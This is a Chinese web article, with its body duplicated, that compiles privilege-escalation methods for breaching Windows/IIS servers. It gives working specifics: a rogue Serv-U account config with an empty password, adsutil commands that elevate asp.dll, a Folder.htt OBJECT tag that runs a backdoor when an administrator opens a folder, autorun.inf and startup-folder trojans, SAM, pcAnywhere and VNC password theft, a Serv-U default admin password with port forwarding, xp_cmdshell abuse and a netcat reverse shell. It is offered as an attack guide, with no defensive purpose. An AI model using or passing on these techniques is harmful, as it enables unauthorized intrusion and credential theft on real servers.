總結(jié)各大高手的提權(quán)思路
發(fā)布日期:2021-12-15 14:39 | 文章來源:gibhub
c: d: e:.....
C:\Documents and Settings\All Users\「開始」菜單\程序\
看這里能不能跳轉(zhuǎn),我們從這里可以獲取好多有用的信息比如Serv-U的路徑,
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
看能否跳轉(zhuǎn)到這個(gè)目錄,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密碼,登陸
c:\Program Files\serv-u\
C:\WINNT\system32\config\
下它的SAM,破解密碼
c:\winnt\system32\inetsrv\data\
是erveryone 完全控制,很多時(shí)候沒作限制,把提升權(quán)限的工具上傳上去,然后執(zhí)行
c:\prel
C:\Program Files\Java Web Start\
c:\Documents and Settings\
C:\Documents and Settings\All Users\
c:\winnt\system32\inetsrv\data\
c:\Program Files\
c:\Program Files\serv-u\
C:\Program Files\Microsoft SQL Server\
c:\Temp\
c:\mysql\(如果服務(wù)器支持PHP)
c:\PHP(如果服務(wù)器支持PHP)
運(yùn)行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提升權(quán)限
還可以用這段代碼試提升,好象不是很理想的
如果主機(jī)設(shè)置很變態(tài),可以試下在c:\Documents and Settings\All Users\「開始」菜單\程序\啟動(dòng)"寫入bat,vbs等木馬。
根目錄下隱藏autorun.inf
C:\PROGRAM FILES\KV2004\ 綁
D:\PROGRAM FILES\RISING\RAV\
C:\Program Files\Real\RealServer\
rar
Folder.htt與desktop.ini
將改寫的Folder.htt與desktop.ini,還有你的木馬或者是VBS或者是什么,放到對方管理員最可能瀏覽的目錄下
replace 替換法 捆綁
腳本 編寫一個(gè)啟動(dòng)/關(guān)機(jī)腳本 重起
刪SAM :( 錯(cuò)
CAcls命令
FlashFXP文件夾Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak
Ring的權(quán)限提升21大法!
以下全部是本人提權(quán)時(shí)候的總結(jié) 很多方法至今沒有機(jī)會(huì)試驗(yàn)也沒有成功,但是我是的確看見別人成功過
的。本人不才,除了第一種方法自己研究的,其他的都是別人的經(jīng)驗(yàn)總結(jié)。希望對朋友有幫助!
1.radmin連接法
條件是你權(quán)限夠大,對方連防火墻也沒有。封裝個(gè)radmin上去,運(yùn)行,開對方端口,然后radmin上去
。本人從來米成功過。,端口到是給對方打開了。
2.paanywhere
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 這里下他的GIF
文件,在本地安裝pcanywhere上去
3.SAM破解
C:\WINNT\system32\config\ 下他的SAM 破解之
4.SU密碼奪取
C:\Documents and Settings\All Users\「開始」菜單\程序\
引用:Serv-U,然后本地查看屬性,知道路徑后,看能否跳轉(zhuǎn)
進(jìn)去后,如果有權(quán)限修改ServUDaemon.ini,加個(gè)用戶上去,密碼為空
[USER=WekweN|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYValues=
這個(gè)用戶具有最高權(quán)限,然后我們就可以ftp上去 quote site exec xxx 來提升權(quán)限
5.c:\winnt\system32\inetsrv\data\
引用:就是這個(gè)目錄,同樣是erveryone 完全控制,我們所要做的就是把提升權(quán)限的工具上傳上去,
然后執(zhí)行
6.SU溢出提權(quán)
這個(gè)網(wǎng)上教程N(yùn)多 不詳細(xì)講解了
7.運(yùn)行Csript
引用:運(yùn)行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提
升權(quán)限
用這個(gè)cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
查看有特權(quán)的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再將asp.dll加入特權(quán)一族
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機(jī)子放的位置不一定一樣)
我們現(xiàn)在加進(jìn)去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32
\inetsrv\asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進(jìn)去了
8.腳本提權(quán)
c:\Documents and Settings\All Users\「開始」菜單\程序\啟動(dòng)"寫入bat,vbs
9.VNC
這個(gè)是小花的文章 HOHO
默認(rèn)情況下VNC密碼存放在HKCU\Software\ORL\WinVNC3\Password
我們可以用vncx4
破解它,vncx4使用很簡單,只要在命令行下輸入
c:\>vncx4 -W
然后順序輸入上面的每一個(gè)十六進(jìn)制數(shù)據(jù),沒輸完一個(gè)回車一次就行了。
10.NC提權(quán)
給對方來個(gè)NC 但是條件是你要有足夠的運(yùn)行權(quán)限 然后把它反彈到自己的電腦上 HOHO OK了
11.社會(huì)工程學(xué)之GUEST提權(quán)
很簡單 查看他的擁護(hù) 一般來說 看到帳戶以后 密碼盡量猜 可能用戶密碼一樣 也可能是他QQ號 郵
箱號 手機(jī)號 盡量看看 HOHO
12.IPC空連接
如果對方真比較白癡的話 掃他的IPC 如果運(yùn)氣好還是弱口令
13.替換服務(wù)
這個(gè)不用說了吧?個(gè)人感覺相當(dāng)復(fù)雜
14.autorun .inf
autorun=xxx.exe 這個(gè)=后面自己寫 HOHO 加上只讀、系統(tǒng)、隱藏屬性 傳到哪個(gè)盤都可以的 不相信
他不運(yùn)行
15.desktop.ini與Folder.htt
引用:首先,我們現(xiàn)在本地建立一個(gè)文件夾,名字不重要,進(jìn)入它,在空白處點(diǎn)右鍵,選擇“自定義
文件夾”(xp好像是不行的)一直下點(diǎn),默認(rèn)即可。完成后,你就會(huì)看到在此目錄下多了兩個(gè)名為Folder
setting的文件架與desktop.ini的文件,(如果你看不到,先取消“隱藏受保護(hù)的操作系統(tǒng)文件”)然后
我們在Folder setting目錄下找到Folder.htt文件,記事本打開,在任意地方加入以下代碼: <OBJECT
ID=”RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=”你的后門文件名”>
</OBJECT> 然后你將你的后門文件放在Folder setting目錄下,把此目錄與desktop.ini一起上傳到對方
任意一個(gè)目錄下,就可以了,只要等管理員瀏覽了此目錄,它就執(zhí)行了我們的后門
16.su覆蓋提權(quán)
本地安裝個(gè)su,將你自己的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini 覆蓋掉,重
起一下Serv-U,于是你上面的所有配置都與他的一模一樣了
17.SU轉(zhuǎn)發(fā)端口
43958這個(gè)是 Serv -U 的本地管理端口。FPIPE.exe上傳他,執(zhí)行命令: Fpipe –v –l 3333 –r
43958 127.0.0.1 意思是將4444端口映射到43958端口上。 然后就可以在本地安裝一個(gè)Serv-u,新建一個(gè)
服務(wù)器,IP填對方IP,帳號為LocalAdministrator 密碼為#1@$ak#.1k;0@p 連接上后你就可以管理他的
Serv-u了
18.SQL帳戶密碼泄露
如果對方開了MSSQL服務(wù)器,我們就可以通過用SQL連接器加管理員帳號(可以從他的連接數(shù)據(jù)庫的
ASP文件中看到),因?yàn)镸SSQL是默認(rèn)的SYSTEM權(quán)限。
引用:對方?jīng)]有刪除xp_cmdshell 方法:使用Sqlexec.exe,在host 一欄中填入對方IP,User與Pass
中填入你所得到的用戶名與密碼。format選擇xp_cmdshell”%s”即可。然后點(diǎn)擊connect,連接上后就可
以在CMD一欄中輸入你想要的CMD命令了
19.asp.dll
引用:因?yàn)閍sp.dll是放在c:\winnt\system32\inetsrv\asp.dll(不同的機(jī)子放的位置不一定相同
)
我們現(xiàn)在加進(jìn)去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32
\inetsrv\asp.dll"
好了,現(xiàn)在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進(jìn)去
C:\Documents and Settings\All Users\「開始」菜單\程序\
看這里能不能跳轉(zhuǎn),我們從這里可以獲取好多有用的信息比如Serv-U的路徑,
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
看能否跳轉(zhuǎn)到這個(gè)目錄,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密碼,登陸
c:\Program Files\serv-u\
C:\WINNT\system32\config\
下它的SAM,破解密碼
c:\winnt\system32\inetsrv\data\
是erveryone 完全控制,很多時(shí)候沒作限制,把提升權(quán)限的工具上傳上去,然后執(zhí)行
c:\prel
C:\Program Files\Java Web Start\
c:\Documents and Settings\
C:\Documents and Settings\All Users\
c:\winnt\system32\inetsrv\data\
c:\Program Files\
c:\Program Files\serv-u\
C:\Program Files\Microsoft SQL Server\
c:\Temp\
c:\mysql\(如果服務(wù)器支持PHP)
c:\PHP(如果服務(wù)器支持PHP)
運(yùn)行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提升權(quán)限
還可以用這段代碼試提升,好象不是很理想的
如果主機(jī)設(shè)置很變態(tài),可以試下在c:\Documents and Settings\All Users\「開始」菜單\程序\啟動(dòng)"寫入bat,vbs等木馬。
根目錄下隱藏autorun.inf
C:\PROGRAM FILES\KV2004\ 綁
D:\PROGRAM FILES\RISING\RAV\
C:\Program Files\Real\RealServer\
rar
Folder.htt與desktop.ini
將改寫的Folder.htt與desktop.ini,還有你的木馬或者是VBS或者是什么,放到對方管理員最可能瀏覽的目錄下
replace 替換法 捆綁
腳本 編寫一個(gè)啟動(dòng)/關(guān)機(jī)腳本 重起
刪SAM :( 錯(cuò)
CAcls命令
FlashFXP文件夾Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak
Ring的權(quán)限提升21大法!
以下全部是本人提權(quán)時(shí)候的總結(jié) 很多方法至今沒有機(jī)會(huì)試驗(yàn)也沒有成功,但是我是的確看見別人成功過
的。本人不才,除了第一種方法自己研究的,其他的都是別人的經(jīng)驗(yàn)總結(jié)。希望對朋友有幫助!
1.radmin連接法
條件是你權(quán)限夠大,對方連防火墻也沒有。封裝個(gè)radmin上去,運(yùn)行,開對方端口,然后radmin上去
。本人從來米成功過。,端口到是給對方打開了。
2.paanywhere
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 這里下他的GIF
文件,在本地安裝pcanywhere上去
3.SAM破解
C:\WINNT\system32\config\ 下他的SAM 破解之
4.SU密碼奪取
C:\Documents and Settings\All Users\「開始」菜單\程序\
引用:Serv-U,然后本地查看屬性,知道路徑后,看能否跳轉(zhuǎn)
進(jìn)去后,如果有權(quán)限修改ServUDaemon.ini,加個(gè)用戶上去,密碼為空
[USER=WekweN|1]
Password=
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYValues=
這個(gè)用戶具有最高權(quán)限,然后我們就可以ftp上去 quote site exec xxx 來提升權(quán)限
5.c:\winnt\system32\inetsrv\data\
引用:就是這個(gè)目錄,同樣是erveryone 完全控制,我們所要做的就是把提升權(quán)限的工具上傳上去,
然后執(zhí)行
6.SU溢出提權(quán)
這個(gè)網(wǎng)上教程N(yùn)多 不詳細(xì)講解了
7.運(yùn)行Csript
引用:運(yùn)行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"來提
升權(quán)限
用這個(gè)cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
查看有特權(quán)的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再將asp.dll加入特權(quán)一族
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機(jī)子放的位置不一定一樣)
我們現(xiàn)在加進(jìn)去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32
\inetsrv\asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進(jìn)去了
8.腳本提權(quán)
c:\Documents and Settings\All Users\「開始」菜單\程序\啟動(dòng)"寫入bat,vbs
9.VNC
這個(gè)是小花的文章 HOHO
默認(rèn)情況下VNC密碼存放在HKCU\Software\ORL\WinVNC3\Password
我們可以用vncx4
破解它,vncx4使用很簡單,只要在命令行下輸入
c:\>vncx4 -W
然后順序輸入上面的每一個(gè)十六進(jìn)制數(shù)據(jù),沒輸完一個(gè)回車一次就行了。
10.NC提權(quán)
給對方來個(gè)NC 但是條件是你要有足夠的運(yùn)行權(quán)限 然后把它反彈到自己的電腦上 HOHO OK了
11.社會(huì)工程學(xué)之GUEST提權(quán)
很簡單 查看他的擁護(hù) 一般來說 看到帳戶以后 密碼盡量猜 可能用戶密碼一樣 也可能是他QQ號 郵
箱號 手機(jī)號 盡量看看 HOHO
12.IPC空連接
如果對方真比較白癡的話 掃他的IPC 如果運(yùn)氣好還是弱口令
13.替換服務(wù)
這個(gè)不用說了吧?個(gè)人感覺相當(dāng)復(fù)雜
14.autorun .inf
autorun=xxx.exe 這個(gè)=后面自己寫 HOHO 加上只讀、系統(tǒng)、隱藏屬性 傳到哪個(gè)盤都可以的 不相信
他不運(yùn)行
15.desktop.ini與Folder.htt
引用:首先,我們現(xiàn)在本地建立一個(gè)文件夾,名字不重要,進(jìn)入它,在空白處點(diǎn)右鍵,選擇“自定義
文件夾”(xp好像是不行的)一直下點(diǎn),默認(rèn)即可。完成后,你就會(huì)看到在此目錄下多了兩個(gè)名為Folder
setting的文件架與desktop.ini的文件,(如果你看不到,先取消“隱藏受保護(hù)的操作系統(tǒng)文件”)然后
我們在Folder setting目錄下找到Folder.htt文件,記事本打開,在任意地方加入以下代碼: <OBJECT
ID=”RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=”你的后門文件名”>
</OBJECT> 然后你將你的后門文件放在Folder setting目錄下,把此目錄與desktop.ini一起上傳到對方
任意一個(gè)目錄下,就可以了,只要等管理員瀏覽了此目錄,它就執(zhí)行了我們的后門
16.su覆蓋提權(quán)
本地安裝個(gè)su,將你自己的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini 覆蓋掉,重
起一下Serv-U,于是你上面的所有配置都與他的一模一樣了
17.SU轉(zhuǎn)發(fā)端口
43958這個(gè)是 Serv -U 的本地管理端口。FPIPE.exe上傳他,執(zhí)行命令: Fpipe –v –l 3333 –r
43958 127.0.0.1 意思是將4444端口映射到43958端口上。 然后就可以在本地安裝一個(gè)Serv-u,新建一個(gè)
服務(wù)器,IP填對方IP,帳號為LocalAdministrator 密碼為#1@$ak#.1k;0@p 連接上后你就可以管理他的
Serv-u了
18.SQL帳戶密碼泄露
如果對方開了MSSQL服務(wù)器,我們就可以通過用SQL連接器加管理員帳號(可以從他的連接數(shù)據(jù)庫的
ASP文件中看到),因?yàn)镸SSQL是默認(rèn)的SYSTEM權(quán)限。
引用:對方?jīng)]有刪除xp_cmdshell 方法:使用Sqlexec.exe,在host 一欄中填入對方IP,User與Pass
中填入你所得到的用戶名與密碼。format選擇xp_cmdshell”%s”即可。然后點(diǎn)擊connect,連接上后就可
以在CMD一欄中輸入你想要的CMD命令了
19.asp.dll
引用:因?yàn)閍sp.dll是放在c:\winnt\system32\inetsrv\asp.dll(不同的機(jī)子放的位置不一定相同
)
我們現(xiàn)在加進(jìn)去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32
\inetsrv\asp.dll"
好了,現(xiàn)在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進(jìn)去
版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。
相關(guān)文章